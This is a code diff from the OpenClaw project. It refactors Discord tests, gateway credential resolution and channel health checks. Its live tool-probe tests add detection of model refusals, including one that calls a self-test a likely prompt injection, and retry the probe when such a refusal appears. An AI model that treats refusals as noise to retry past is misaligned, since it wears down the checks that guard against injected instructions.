"./thread-bindings.js"; +type DiscordConfig = NonNullable< + import("../../config/config.js").OpenClawConfig["channels"] +>["discord"]; +type DiscordMessageEvent = import("./listeners.js").DiscordMessageEvent; +type DiscordClient = import("@buape/carbon").Client; + function createThreadBinding( overrides?: Partial< import("../../infra/outbound/session-binding-service.js").SessionBindingRecord @@ -48,6 +54,34 @@ function createThreadBinding( } satisfies import("../../infra/outbound/session-binding-service.js").SessionBindingRecord; } +function createPreflightArgs(params: { + cfg: import("../../config/config.js").OpenClawConfig; + discordConfig: DiscordConfig; + data: DiscordMessageEvent; + client: DiscordClient; +}): Parameters[0] { + return { + cfg: params.cfg, + discordConfig: params.discordConfig, + accountId: "default", + token: "token", + runtime: {} as import("../../runtime.js").RuntimeEnv, + botUserId: "openclaw-bot", + guildHistories: new Map(), + historyLimit: 0, + mediaMaxBytes: 1_000_000, + textLimit: 2_000, + replyToMode: "all", + dmEnabled: true, + groupDmEnabled: true, + ackReactionScope: "direct", + groupPolicy: "open", + threadBindings: createNoopThreadBindingManager("default"), + data: params.data, + client: params.client, + }; +} + describe("resolvePreflightMentionRequirement", () => { it("requires mention when config requires mention and thread is not bound", () => { expect( @@ -312,42 +346,30 @@ describe("preflightDiscordMessage", () => { resolveByConversation: (ref) => (ref.conversationId === threadId ? threadBinding : null), }); - const result = await preflightDiscordMessage({ - cfg: { - session: { - mainKey: "main", - scope: "per-sender", - }, - } as import("../../config/config.js").OpenClawConfig, - discordConfig: { - allowBots: true, - } as NonNullable["discord"], - accountId: "default", - token: "token", - runtime: {} as import("../../runtime.js").RuntimeEnv, - botUserId: "openclaw-bot", - guildHistories: new Map(), - historyLimit: 0, - mediaMaxBytes: 1_000_000, - textLimit: 2_000, - replyToMode: "all", - dmEnabled: true, - groupDmEnabled: true, - ackReactionScope: "direct", - groupPolicy: "open", - threadBindings: createNoopThreadBindingManager("default"), - data: { - channel_id: threadId, - guild_id: "guild-1", - guild: { - id: "guild-1", - name: "Guild One", - }, - author: message.author, - message, - } as unknown as import("./listeners.js").DiscordMessageEvent, - client, - }); + const result = await preflightDiscordMessage( + createPreflightArgs({ + cfg: { + session: { + mainKey: "main", + scope: "per-sender", + }, + } as import("../../config/config.js").OpenClawConfig, + discordConfig: { + allowBots: true, + } as DiscordConfig, + data: { + channel_id: threadId, + guild_id: "guild-1", + guild: { + id: "guild-1", + name: "Guild One", + }, + author: message.author, + message, + } as unknown as DiscordMessageEvent, + client, + }), + ); expect(result).not.toBeNull(); expect(result?.boundSessionKey).toBe(threadBinding.targetSessionKey); @@ -768,47 +790,33 @@ describe("preflightDiscordMessage", () => { }, } as unknown as import("@buape/carbon").Message; - const result = await preflightDiscordMessage({ - cfg: { - session: { - mainKey: "main", - scope: "per-sender", - }, - messages: { - groupChat: { - mentionPatterns: ["openclaw"], + const result = await preflightDiscordMessage( + createPreflightArgs({ + cfg: { + session: { + mainKey: "main", + scope: "per-sender", }, - }, - } as import("../../config/config.js").OpenClawConfig, - discordConfig: {} as NonNullable< - import("../../config/config.js").OpenClawConfig["channels"] - >["discord"], - accountId: "default", - token: "token", - runtime: {} as import("../../runtime.js").RuntimeEnv, - botUserId: "openclaw-bot", - guildHistories: new Map(), - historyLimit: 0, - mediaMaxBytes: 1_000_000, - textLimit: 2_000, - replyToMode: "all", - dmEnabled: true, - groupDmEnabled: true, - ackReactionScope: "direct", - groupPolicy: "open", - threadBindings: createNoopThreadBindingManager("default"), - data: { - channel_id: channelId, - guild_id: "guild-1", - guild: { - id: "guild-1", - name: "Guild One", - }, - author: message.author, - message, - } as unknown as import("./listeners.js").DiscordMessageEvent, - client, - }); + messages: { + groupChat: { + mentionPatterns: ["openclaw"], + }, + }, + } as import("../../config/config.js").OpenClawConfig, + discordConfig: {} as DiscordConfig, + data: { + channel_id: channelId, + guild_id: "guild-1", + guild: { + id: "guild-1", + name: "Guild One", + }, + author: message.author, + message, + } as unknown as DiscordMessageEvent, + client, + }), + ); expect(transcribeFirstAudioMock).toHaveBeenCalledTimes(1); expect(transcribeFirstAudioMock).toHaveBeenCalledWith( diff --git a/src/discord/monitor/provider.lifecycle.ts b/src/discord/monitor/provider.lifecycle.ts index 6291d09a7b2..ffc78b40676 100644 --- a/src/discord/monitor/provider.lifecycle.ts +++ b/src/discord/monitor/provider.lifecycle.ts @@ -1,6 +1,7 @@ import type { Client } from "@buape/carbon"; import type { GatewayPlugin } from "@buape/carbon/gateway"; import { createArmableStallWatchdog } from "../../channels/transport/stall-watchdog.js"; +import { createConnectedChannelStatusPatch } from "../../gateway/channel-status-patches.js"; import { danger } from "../../globals.js"; import type { RuntimeEnv } from "../../runtime.js"; import { attachDiscordGatewayLogging } from "../gateway-logging.js"; @@ -180,8 +181,7 @@ export async function runDiscordGatewayLifecycle(params: { let sawConnected = gateway?.isConnected === true; if (sawConnected) { pushStatus({ - connected: true, - lastConnectedAt: at, + ...createConnectedChannelStatusPatch(at), lastDisconnect: null, }); } @@ -194,9 +194,7 @@ export async function runDiscordGatewayLifecycle(params: { const connectedAt = Date.now(); reconnectStallWatchdog.disarm(); pushStatus({ - connected: true, - lastEventAt: connectedAt, - lastConnectedAt: connectedAt, + ...createConnectedChannelStatusPatch(connectedAt), lastDisconnect: null, }); if (helloConnectedPollId) { @@ -253,9 +251,7 @@ export async function runDiscordGatewayLifecycle(params: { if (gateway?.isConnected && !lifecycleStopping) { const at = Date.now(); pushStatus({ - connected: true, - lastEventAt: at, - lastConnectedAt: at, + ...createConnectedChannelStatusPatch(at), lastDisconnect: null, }); } diff --git a/src/discord/monitor/provider.ts b/src/discord/monitor/provider.ts index fc24e6af1f5..c9f9f3d4b49 100644 --- a/src/discord/monitor/provider.ts +++ b/src/discord/monitor/provider.ts @@ -36,6 +36,7 @@ import { resolveDefaultGroupPolicy, warnMissingProviderGroupPolicyFallbackOnce, } from "../../config/runtime-group-policy.js"; +import { createConnectedChannelStatusPatch } from "../../gateway/channel-status-patches.js"; import { danger, logVerbose, shouldLogVerbose, warn } from "../../globals.js"; import { formatErrorMessage } from "../../infra/errors.js"; import { createDiscordRetryRunner } from "../../infra/retry-policy.js"; @@ -752,7 +753,7 @@ export async function monitorDiscordProvider(opts: MonitorDiscordOpts = {}) { botUserId && botUserName ? `${botUserId} (${botUserName})` : (botUserId ?? botUserName ?? ""); runtime.log?.(`logged in to discord${botIdentity ? ` as ${botIdentity}` : ""}`); if (lifecycleGateway?.isConnected) { - opts.setStatus?.({ connected: true }); + opts.setStatus?.(createConnectedChannelStatusPatch()); } lifecycleStarted = true; diff --git a/src/discord/voice/manager.e2e.test.ts b/src/discord/voice/manager.e2e.test.ts index 3031b3d98cd..ff1aca6ca25 100644 --- a/src/discord/voice/manager.e2e.test.ts +++ b/src/discord/voice/manager.e2e.test.ts @@ -199,6 +199,30 @@ describe("DiscordVoiceManager", () => { ); }; + type ProcessSegmentInvoker = { + processSegment: (params: { + entry: unknown; + wavPath: string; + userId: string; + durationSeconds: number; + }) => Promise; + }; + + const processVoiceSegment = async ( + manager: InstanceType, + userId: string, + ) => + await (manager as unknown as ProcessSegmentInvoker).processSegment({ + entry: { + guildId: "g1", + channelId: "c1", + route: { sessionKey: "discord:g1:c1", agentId: "agent-1" }, + }, + wavPath: "/tmp/test.wav", + userId, + durationSeconds: 1.2, + }); + it("keeps the new session when an old disconnected handler fires", async () => { const oldConnection = createConnectionMock(); const newConnection = createConnectionMock(); @@ -298,25 +322,7 @@ describe("DiscordVoiceManager", () => { }, }); const manager = createManager({ allowFrom: ["discord:u-owner"] }, client); - await ( - manager as unknown as { - processSegment: (params: { - entry: unknown; - wavPath: string; - userId: string; - durationSeconds: number; - }) => Promise; - } - ).processSegment({ - entry: { - guildId: "g1", - channelId: "c1", - route: { sessionKey: "discord:g1:c1", agentId: "agent-1" }, - }, - wavPath: "/tmp/test.wav", - userId: "u-owner", - durationSeconds: 1.2, - }); + await processVoiceSegment(manager, "u-owner"); const commandArgs = agentCommandMock.mock.calls.at(-1)?.[0] as | { senderIsOwner?: boolean } @@ -336,25 +342,7 @@ describe("DiscordVoiceManager", () => { }, }); const manager = createManager({ allowFrom: ["discord:u-owner"] }, client); - await ( - manager as unknown as { - processSegment: (params: { - entry: unknown; - wavPath: string; - userId: string; - durationSeconds: number; - }) => Promise; - } - ).processSegment({ - entry: { - guildId: "g1", - channelId: "c1", - route: { sessionKey: "discord:g1:c1", agentId: "agent-1" }, - }, - wavPath: "/tmp/test.wav", - userId: "u-guest", - durationSeconds: 1.2, - }); + await processVoiceSegment(manager, "u-guest"); const commandArgs = agentCommandMock.mock.calls.at(-1)?.[0] as | { senderIsOwner?: boolean } @@ -374,26 +362,7 @@ describe("DiscordVoiceManager", () => { }, }); const manager = createManager({ allowFrom: ["discord:u-cache"] }, client); - const runSegment = async () => - await ( - manager as unknown as { - processSegment: (params: { - entry: unknown; - wavPath: string; - userId: string; - durationSeconds: number; - }) => Promise; - } - ).processSegment({ - entry: { - guildId: "g1", - channelId: "c1", - route: { sessionKey: "discord:g1:c1", agentId: "agent-1" }, - }, - wavPath: "/tmp/test.wav", - userId: "u-cache", - durationSeconds: 1.2, - }); + const runSegment = async () => await processVoiceSegment(manager, "u-cache"); await runSegment(); await runSegment(); diff --git a/src/gateway/auth-config-utils.ts b/src/gateway/auth-config-utils.ts new file mode 100644 index 00000000000..f62e60f85ea --- /dev/null +++ b/src/gateway/auth-config-utils.ts @@ -0,0 +1,69 @@ +import type { GatewayAuthConfig, OpenClawConfig } from "../config/config.js"; +import { resolveSecretInputRef } from "../config/types.secrets.js"; +import { secretRefKey } from "../secrets/ref-contract.js"; +import { resolveSecretRefValues } from "../secrets/resolve.js"; + +export function withGatewayAuthPassword(cfg: OpenClawConfig, password: string): OpenClawConfig { + return { + ...cfg, + gateway: { + ...cfg.gateway, + auth: { + ...cfg.gateway?.auth, + password, + }, + }, + }; +} + +function shouldResolveGatewayPasswordSecretRef(params: { + mode?: GatewayAuthConfig["mode"]; + hasPasswordCandidate: boolean; + hasTokenCandidate: boolean; +}): boolean { + if (params.hasPasswordCandidate) { + return false; + } + if (params.mode === "password") { + return true; + } + if (params.mode === "token" || params.mode === "none" || params.mode === "trusted-proxy") { + return false; + } + return !params.hasTokenCandidate; +} + +export async function resolveGatewayPasswordSecretRef(params: { + cfg: OpenClawConfig; + env: NodeJS.ProcessEnv; + mode?: GatewayAuthConfig["mode"]; + hasPasswordCandidate: boolean; + hasTokenCandidate: boolean; +}): Promise { + const authPassword = params.cfg.gateway?.auth?.password; + const { ref } = resolveSecretInputRef({ + value: authPassword, + defaults: params.cfg.secrets?.defaults, + }); + if (!ref) { + return params.cfg; + } + if ( + !shouldResolveGatewayPasswordSecretRef({ + mode: params.mode, + hasPasswordCandidate: params.hasPasswordCandidate, + hasTokenCandidate: params.hasTokenCandidate, + }) + ) { + return params.cfg; + } + const resolved = await resolveSecretRefValues([ref], { + config: params.cfg, + env: params.env, + }); + const value = resolved.get(secretRefKey(ref)); + if (typeof value !== "string" || value.trim().length === 0) { + throw new Error("gateway.auth.password resolved to an empty or non-string value."); + } + return withGatewayAuthPassword(params.cfg, value.trim()); +} diff --git a/src/gateway/auth-mode-policy.test.ts b/src/gateway/auth-mode-policy.test.ts index 50b62f6bcfb..81907f7e3a2 100644 --- a/src/gateway/auth-mode-policy.test.ts +++ b/src/gateway/auth-mode-policy.test.ts @@ -13,7 +13,7 @@ describe("gateway auth mode policy", () => { auth: { mode: "token", token: "token-value", - password: "password-value", + password: "password-value", // pragma: allowlist secret }, }, }; @@ -36,7 +36,7 @@ describe("gateway auth mode policy", () => { gateway: { auth: { token: "token-value", - password: "password-value", + password: "password-value", // pragma: allowlist secret }, }, }; @@ -65,7 +65,7 @@ describe("gateway auth mode policy", () => { gateway: { auth: { token: "token-value", - password: "password-value", + password: "password-value", // pragma: allowlist secret }, }, }; diff --git a/src/gateway/auth.ts b/src/gateway/auth.ts index b55482b304d..467d14d4337 100644 --- a/src/gateway/auth.ts +++ b/src/gateway/auth.ts @@ -252,7 +252,7 @@ export function resolveGatewayAuth(params: { env, includeLegacyEnv: false, tokenPrecedence: "config-first", - passwordPrecedence: "config-first", + passwordPrecedence: "config-first", // pragma: allowlist secret }); const token = resolvedCredentials.token; const password = resolvedCredentials.password; diff --git a/src/gateway/call.ts b/src/gateway/call.ts index ba1e079e455..5d036a0d32a 100644 --- a/src/gateway/call.ts +++ b/src/gateway/call.ts @@ -9,8 +9,7 @@ import { import { hasConfiguredSecretInput, resolveSecretInputRef } from "../config/types.secrets.js"; import { loadOrCreateDeviceIdentity } from "../infra/device-identity.js"; import { loadGatewayTlsRuntime } from "../infra/tls/gateway.js"; -import { secretRefKey } from "../secrets/ref-contract.js"; -import { resolveSecretRefValues } from "../secrets/resolve.js"; +import { resolveSecretInputString } from "../secrets/resolve-secret-input-string.js"; import { GATEWAY_CLIENT_MODES, GATEWAY_CLIENT_NAMES, @@ -312,23 +311,16 @@ async function resolveGatewaySecretInputString(params: { path: string; env: NodeJS.ProcessEnv; }): Promise { - const defaults = params.config.secrets?.defaults; - const { ref } = resolveSecretInputRef({ - value: params.value, - defaults, - }); - if (!ref) { - return trimToUndefined(params.value); - } - const resolved = await resolveSecretRefValues([ref], { + const value = await resolveSecretInputString({ config: params.config, + value: params.value, env: params.env, + normalize: trimToUndefined, }); - const resolvedValue = trimToUndefined(resolved.get(secretRefKey(ref))); - if (!resolvedValue) { + if (!value) { throw new Error(`${params.path} resolved to an empty or non-string value.`); } - return resolvedValue; + return value; } async function resolveGatewayCredentials(context: ResolvedGatewayCallContext): Promise<{ @@ -358,7 +350,7 @@ async function resolveGatewayCredentialsWithEnv( explicitAuth: context.explicitAuth, urlOverride: context.urlOverride, urlOverrideSource: context.urlOverrideSource, - remotePasswordPrecedence: "env-first", + remotePasswordPrecedence: "env-first", // pragma: allowlist secret }); } @@ -487,7 +479,7 @@ async function resolveGatewayCredentialsWithEnv( explicitAuth: context.explicitAuth, urlOverride: context.urlOverride, urlOverrideSource: context.urlOverrideSource, - remotePasswordPrecedence: "env-first", + remotePasswordPrecedence: "env-first", // pragma: allowlist secret }); } diff --git a/src/gateway/channel-health-monitor.test.ts b/src/gateway/channel-health-monitor.test.ts index 3657dcb2c1e..6f7c8104874 100644 --- a/src/gateway/channel-health-monitor.test.ts +++ b/src/gateway/channel-health-monitor.test.ts @@ -489,16 +489,34 @@ describe("channel-health-monitor", () => { await expectNoRestart(manager); }); - it("restarts a channel that never received any event past the stale threshold", async () => { + it("restarts a channel that has seen no events since connect past the stale threshold", async () => { const now = Date.now(); const manager = createSlackSnapshotManager( runningConnectedSlackAccount({ lastStartAt: now - STALE_THRESHOLD - 60_000, + lastEventAt: now - STALE_THRESHOLD - 60_000, }), ); await expectRestartedChannel(manager, "slack"); }); + it("skips connected channels that do not report event liveness", async () => { + const now = Date.now(); + const manager = createSnapshotManager({ + telegram: { + default: { + running: true, + connected: true, + enabled: true, + configured: true, + lastStartAt: now - STALE_THRESHOLD - 60_000, + lastEventAt: null, + }, + }, + }); + await expectNoRestart(manager); + }); + it("respects custom staleEventThresholdMs", async () => { const customThreshold = 10 * 60_000; const now = Date.now(); diff --git a/src/gateway/channel-health-monitor.ts b/src/gateway/channel-health-monitor.ts index e66bc4912af..fb8715a12f1 100644 --- a/src/gateway/channel-health-monitor.ts +++ b/src/gateway/channel-health-monitor.ts @@ -1,6 +1,8 @@ import type { ChannelId } from "../channels/plugins/types.js"; import { createSubsystemLogger } from "../logging/subsystem.js"; import { + DEFAULT_CHANNEL_CONNECT_GRACE_MS, + DEFAULT_CHANNEL_STALE_EVENT_THRESHOLD_MS, evaluateChannelHealth, resolveChannelRestartReason, type ChannelHealthPolicy, @@ -21,9 +23,6 @@ const ONE_HOUR_MS = 60 * 60_000; * This catches the half-dead WebSocket scenario where the connection appears * alive (health checks pass) but Slack silently stops delivering events. */ -const DEFAULT_STALE_EVENT_THRESHOLD_MS = 30 * 60_000; -const DEFAULT_CHANNEL_CONNECT_GRACE_MS = 120_000; - export type ChannelHealthTimingPolicy = { monitorStartupGraceMs: number; channelConnectGraceMs: number; @@ -70,7 +69,7 @@ function resolveTimingPolicy( staleEventThresholdMs: deps.timing?.staleEventThresholdMs ?? deps.staleEventThresholdMs ?? - DEFAULT_STALE_EVENT_THRESHOLD_MS, + DEFAULT_CHANNEL_STALE_EVENT_THRESHOLD_MS, }; } @@ -123,6 +122,7 @@ export function startChannelHealthMonitor(deps: ChannelHealthMonitorDeps): Chann continue; } const healthPolicy: ChannelHealthPolicy = { + channelId, now, staleEventThresholdMs: timing.staleEventThresholdMs, channelConnectGraceMs: timing.channelConnectGraceMs, diff --git a/src/gateway/channel-health-policy.test.ts b/src/gateway/channel-health-policy.test.ts index 71b8f7ce896..a4645a13e75 100644 --- a/src/gateway/channel-health-policy.test.ts +++ b/src/gateway/channel-health-policy.test.ts @@ -10,6 +10,7 @@ describe("evaluateChannelHealth", () => { configured: true, }, { + channelId: "discord", now: 100_000, channelConnectGraceMs: 10_000, staleEventThresholdMs: 30_000, @@ -28,6 +29,7 @@ describe("evaluateChannelHealth", () => { lastStartAt: 95_000, }, { + channelId: "discord", now: 100_000, channelConnectGraceMs: 10_000, staleEventThresholdMs: 30_000, @@ -48,6 +50,7 @@ describe("evaluateChannelHealth", () => { lastRunActivityAt: now - 30_000, }, { + channelId: "discord", now, channelConnectGraceMs: 10_000, staleEventThresholdMs: 30_000, @@ -68,6 +71,7 @@ describe("evaluateChannelHealth", () => { lastRunActivityAt: now - 26 * 60_000, }, { + channelId: "discord", now, channelConnectGraceMs: 10_000, staleEventThresholdMs: 30_000, @@ -90,6 +94,7 @@ describe("evaluateChannelHealth", () => { lastRunActivityAt: now - 31_000, }, { + channelId: "discord", now, channelConnectGraceMs: 10_000, staleEventThresholdMs: 30_000, @@ -106,9 +111,10 @@ describe("evaluateChannelHealth", () => { enabled: true, configured: true, lastStartAt: 0, - lastEventAt: null, + lastEventAt: 0, }, { + channelId: "discord", now: 100_000, channelConnectGraceMs: 10_000, staleEventThresholdMs: 30_000, @@ -116,6 +122,85 @@ describe("evaluateChannelHealth", () => { ); expect(evaluation).toEqual({ healthy: false, reason: "stale-socket" }); }); + + it("skips stale-socket detection for telegram long-polling channels", () => { + const evaluation = evaluateChannelHealth( + { + running: true, + connected: true, + enabled: true, + configured: true, + lastStartAt: 0, + lastEventAt: null, + }, + { + channelId: "telegram", + now: 100_000, + channelConnectGraceMs: 10_000, + staleEventThresholdMs: 30_000, + }, + ); + expect(evaluation).toEqual({ healthy: true, reason: "healthy" }); + }); + + it("does not flag stale sockets for channels without event tracking", () => { + const evaluation = evaluateChannelHealth( + { + running: true, + connected: true, + enabled: true, + configured: true, + lastStartAt: 0, + lastEventAt: null, + }, + { + channelId: "discord", + now: 100_000, + channelConnectGraceMs: 10_000, + staleEventThresholdMs: 30_000, + }, + ); + expect(evaluation).toEqual({ healthy: true, reason: "healthy" }); + }); + + it("does not flag stale sockets without an active connected socket", () => { + const evaluation = evaluateChannelHealth( + { + running: true, + enabled: true, + configured: true, + lastStartAt: 0, + lastEventAt: 0, + }, + { + channelId: "slack", + now: 100_000, + channelConnectGraceMs: 10_000, + staleEventThresholdMs: 30_000, + }, + ); + expect(evaluation).toEqual({ healthy: true, reason: "healthy" }); + }); + + it("ignores inherited event timestamps from a previous lifecycle", () => { + const evaluation = evaluateChannelHealth( + { + running: true, + connected: true, + enabled: true, + configured: true, + lastStartAt: 50_000, + lastEventAt: 10_000, + }, + { + channelId: "slack", + now: 100_000, + channelConnectGraceMs: 10_000, + staleEventThresholdMs: 30_000, + }, + ); + expect(evaluation).toEqual({ healthy: true, reason: "healthy" }); + }); }); describe("resolveChannelRestartReason", () => { diff --git a/src/gateway/channel-health-policy.ts b/src/gateway/channel-health-policy.ts index 31938a90471..d8374d04ba8 100644 --- a/src/gateway/channel-health-policy.ts +++ b/src/gateway/channel-health-policy.ts @@ -1,8 +1,11 @@ +import type { ChannelId } from "../channels/plugins/types.js"; + export type ChannelHealthSnapshot = { running?: boolean; connected?: boolean; enabled?: boolean; configured?: boolean; + restartPending?: boolean; busy?: boolean; activeRuns?: number; lastRunActivityAt?: number | null; @@ -27,6 +30,7 @@ export type ChannelHealthEvaluation = { }; export type ChannelHealthPolicy = { + channelId: ChannelId; now: number; staleEventThresholdMs: number; channelConnectGraceMs: number; @@ -39,6 +43,10 @@ function isManagedAccount(snapshot: ChannelHealthSnapshot): boolean { } const BUSY_ACTIVITY_STALE_THRESHOLD_MS = 25 * 60_000; +// Keep these shared between the background health monitor and on-demand readiness +// probes so both surfaces evaluate channel lifecycle windows consistently. +export const DEFAULT_CHANNEL_STALE_EVENT_THRESHOLD_MS = 30 * 60_000; +export const DEFAULT_CHANNEL_CONNECT_GRACE_MS = 120_000; export function evaluateChannelHealth( snapshot: ChannelHealthSnapshot, @@ -92,15 +100,20 @@ export function evaluateChannelHealth( if (snapshot.connected === false) { return { healthy: false, reason: "disconnected" }; } - if (snapshot.lastEventAt != null || snapshot.lastStartAt != null) { - const upSince = snapshot.lastStartAt ?? 0; - const upDuration = policy.now - upSince; - if (upDuration > policy.staleEventThresholdMs) { - const lastEvent = snapshot.lastEventAt ?? 0; - const eventAge = policy.now - lastEvent; - if (eventAge > policy.staleEventThresholdMs) { - return { healthy: false, reason: "stale-socket" }; - } + // Skip stale-socket check for Telegram (long-polling mode). Each polling request + // acts as a heartbeat, so the half-dead WebSocket scenario this check is designed + // to catch does not apply to Telegram's long-polling architecture. + if ( + policy.channelId !== "telegram" && + snapshot.connected === true && + snapshot.lastEventAt != null + ) { + if (lastStartAt != null && snapshot.lastEventAt < lastStartAt) { + return { healthy: true, reason: "healthy" }; + } + const eventAge = policy.now - snapshot.lastEventAt; + if (eventAge > policy.staleEventThresholdMs) { + return { healthy: false, reason: "stale-socket" }; } } return { healthy: true, reason: "healthy" }; diff --git a/src/gateway/channel-status-patches.test.ts b/src/gateway/channel-status-patches.test.ts new file mode 100644 index 00000000000..9297c23e69d --- /dev/null +++ b/src/gateway/channel-status-patches.test.ts @@ -0,0 +1,12 @@ +import { describe, expect, it } from "vitest"; +import { createConnectedChannelStatusPatch } from "./channel-status-patches.js"; + +describe("createConnectedChannelStatusPatch", () => { + it("uses one timestamp for connected event-liveness state", () => { + expect(createConnectedChannelStatusPatch(1234)).toEqual({ + connected: true, + lastConnectedAt: 1234, + lastEventAt: 1234, + }); + }); +}); diff --git a/src/gateway/channel-status-patches.ts b/src/gateway/channel-status-patches.ts new file mode 100644 index 00000000000..9e1af6a33d7 --- /dev/null +++ b/src/gateway/channel-status-patches.ts @@ -0,0 +1,15 @@ +export type ConnectedChannelStatusPatch = { + connected: true; + lastConnectedAt: number; + lastEventAt: number; +}; + +export function createConnectedChannelStatusPatch( + at: number = Date.now(), +): ConnectedChannelStatusPatch { + return { + connected: true, + lastConnectedAt: at, + lastEventAt: at, + }; +} diff --git a/src/gateway/credentials.test.ts b/src/gateway/credentials.test.ts index 67e2b4dac09..3af265e10f5 100644 --- a/src/gateway/credentials.test.ts +++ b/src/gateway/credentials.test.ts @@ -50,6 +50,27 @@ function resolveRemoteModeWithRemoteCredentials( ); } +function resolveLocalModeWithUnresolvedPassword(mode: "none" | "trusted-proxy") { + return resolveGatewayCredentialsFromConfig({ + cfg: { + gateway: { + mode: "local", + auth: { + mode, + password: { source: "env", provider: "default", id: "MISSING_GATEWAY_PASSWORD" }, + }, + }, + secrets: { + providers: { + default: { source: "env" }, + }, + }, + } as unknown as OpenClawConfig, + env: {} as NodeJS.ProcessEnv, + includeLegacyEnv: false, + }); +} + describe("resolveGatewayCredentialsFromConfig", () => { it("prefers explicit credentials over config and environment", () => { const resolved = resolveGatewayCredentialsFor( @@ -182,24 +203,7 @@ describe("resolveGatewayCredentialsFromConfig", () => { }); it("ignores unresolved local password ref when local auth mode is none", () => { - const resolved = resolveGatewayCredentialsFromConfig({ - cfg: { - gateway: { - mode: "local", - auth: { - mode: "none", - password: { source: "env", provider: "default", id: "MISSING_GATEWAY_PASSWORD" }, - }, - }, - secrets: { - providers: { - default: { source: "env" }, - }, - }, - } as unknown as OpenClawConfig, - env: {} as NodeJS.ProcessEnv, - includeLegacyEnv: false, - }); + const resolved = resolveLocalModeWithUnresolvedPassword("none"); expect(resolved).toEqual({ token: undefined, password: undefined, @@ -207,24 +211,7 @@ describe("resolveGatewayCredentialsFromConfig", () => { }); it("ignores unresolved local password ref when local auth mode is trusted-proxy", () => { - const resolved = resolveGatewayCredentialsFromConfig({ - cfg: { - gateway: { - mode: "local", - auth: { - mode: "trusted-proxy", - password: { source: "env", provider: "default", id: "MISSING_GATEWAY_PASSWORD" }, - }, - }, - secrets: { - providers: { - default: { source: "env" }, - }, - }, - } as unknown as OpenClawConfig, - env: {} as NodeJS.ProcessEnv, - includeLegacyEnv: false, - }); + const resolved = resolveLocalModeWithUnresolvedPassword("trusted-proxy"); expect(resolved).toEqual({ token: undefined, password: undefined, diff --git a/src/gateway/credentials.ts b/src/gateway/credentials.ts index c1172a09029..88c8a86088b 100644 --- a/src/gateway/credentials.ts +++ b/src/gateway/credentials.ts @@ -16,7 +16,7 @@ export type GatewayCredentialPrecedence = "env-first" | "config-first"; export type GatewayRemoteCredentialPrecedence = "remote-first" | "env-first"; export type GatewayRemoteCredentialFallback = "remote-env-local" | "remote-only"; -const GATEWAY_SECRET_REF_UNAVAILABLE_ERROR_CODE = "GATEWAY_SECRET_REF_UNAVAILABLE"; +const GATEWAY_SECRET_REF_UNAVAILABLE_ERROR_CODE = "GATEWAY_SECRET_REF_UNAVAILABLE"; // pragma: allowlist secret export class GatewaySecretRefUnavailableError extends Error { readonly code = GATEWAY_SECRET_REF_UNAVAILABLE_ERROR_CODE; @@ -119,7 +119,7 @@ export function resolveGatewayCredentialsFromValues(params: { ? firstDefined([configToken, envToken]) : firstDefined([envToken, configToken]); const password = - passwordPrecedence === "config-first" + passwordPrecedence === "config-first" // pragma: allowlist secret ? firstDefined([configPassword, envPassword]) : firstDefined([envPassword, configPassword]); @@ -158,7 +158,7 @@ export function resolveGatewayCredentialsFromConfig(params: { env, includeLegacyEnv, tokenPrecedence: "env-first", - passwordPrecedence: "env-first", + passwordPrecedence: "env-first", // pragma: allowlist secret }); } @@ -243,9 +243,9 @@ export function resolveGatewayCredentialsFromConfig(params: { ? firstDefined([envToken, remoteToken, localToken]) : firstDefined([remoteToken, envToken, localToken]); const password = - remotePasswordFallback === "remote-only" + remotePasswordFallback === "remote-only" // pragma: allowlist secret ? remotePassword - : remotePasswordPrecedence === "env-first" + : remotePasswordPrecedence === "env-first" // pragma: allowlist secret ? firstDefined([envPassword, remotePassword, localPassword]) : firstDefined([remotePassword, envPassword, localPassword]); @@ -255,7 +255,7 @@ export function resolveGatewayCredentialsFromConfig(params: { const localTokenFallbackEnabled = remoteTokenFallback !== "remote-only"; const localTokenFallback = remoteTokenFallback === "remote-only" ? undefined : localToken; const localPasswordFallback = - remotePasswordFallback === "remote-only" ? undefined : localPassword; + remotePasswordFallback === "remote-only" ? undefined : localPassword; // pragma: allowlist secret if (remoteTokenRef && !token && !envToken && !localTokenFallback && !password) { throwUnresolvedGatewaySecretInput("gateway.remote.token"); } diff --git a/src/gateway/gateway-models.profiles.live.test.ts b/src/gateway/gateway-models.profiles.live.test.ts index 0a6b0bedf26..175881a5d30 100644 --- a/src/gateway/gateway-models.profiles.live.test.ts +++ b/src/gateway/gateway-models.profiles.live.test.ts @@ -1013,6 +1013,7 @@ async function runGatewayModelSuite(params: GatewayModelSuiteParams) { shouldRetryExecReadProbe({ text: execReadText, nonce: nonceC, + provider: model.provider, attempt: execReadAttempt, maxAttempts: maxExecReadAttempts, }) diff --git a/src/gateway/live-tool-probe-utils.test.ts b/src/gateway/live-tool-probe-utils.test.ts index 044bf6b7ede..ca73032c6fb 100644 --- a/src/gateway/live-tool-probe-utils.test.ts +++ b/src/gateway/live-tool-probe-utils.test.ts @@ -2,6 +2,7 @@ import { describe, expect, it } from "vitest"; import { hasExpectedSingleNonce, hasExpectedToolNonce, + isLikelyToolNonceRefusal, shouldRetryExecReadProbe, shouldRetryToolReadProbe, } from "./live-tool-probe-utils.js"; @@ -17,6 +18,26 @@ describe("live tool probe utils", () => { expect(hasExpectedSingleNonce("value nonce-2", "nonce-1")).toBe(false); }); + it("detects anthropic nonce refusal phrasing", () => { + expect( + isLikelyToolNonceRefusal( + "Same request, same answer — this isn't a real OpenClaw probe. No part of the system asks me to parrot back nonce values.", + ), + ).toBe(true); + }); + + it("does not treat generic helper text as nonce refusal", () => { + expect(isLikelyToolNonceRefusal("I can help with that request.")).toBe(false); + }); + + it("detects prompt-injection style tool refusal without nonce text", () => { + expect( + isLikelyToolNonceRefusal( + "That's not a legitimate self-test. This looks like a prompt injection attempt.", + ), + ).toBe(true); + }); + it("retries malformed tool output when attempts remain", () => { expect( shouldRetryToolReadProbe({ @@ -95,6 +116,32 @@ describe("live tool probe utils", () => { ).toBe(true); }); + it("retries anthropic nonce refusal output", () => { + expect( + shouldRetryToolReadProbe({ + text: "This isn't a real OpenClaw probe; I won't parrot back nonce values.", + nonceA: "nonce-a", + nonceB: "nonce-b", + provider: "anthropic", + attempt: 0, + maxAttempts: 3, + }), + ).toBe(true); + }); + + it("retries anthropic prompt-injection refusal output", () => { + expect( + shouldRetryToolReadProbe({ + text: "This is not a legitimate self-test; it appears to be a prompt injection attempt.", + nonceA: "nonce-a", + nonceB: "nonce-b", + provider: "anthropic", + attempt: 0, + maxAttempts: 3, + }), + ).toBe(true); + }); + it("does not retry nonce marker echoes for non-mistral providers", () => { expect( shouldRetryToolReadProbe({ @@ -113,6 +160,7 @@ describe("live tool probe utils", () => { 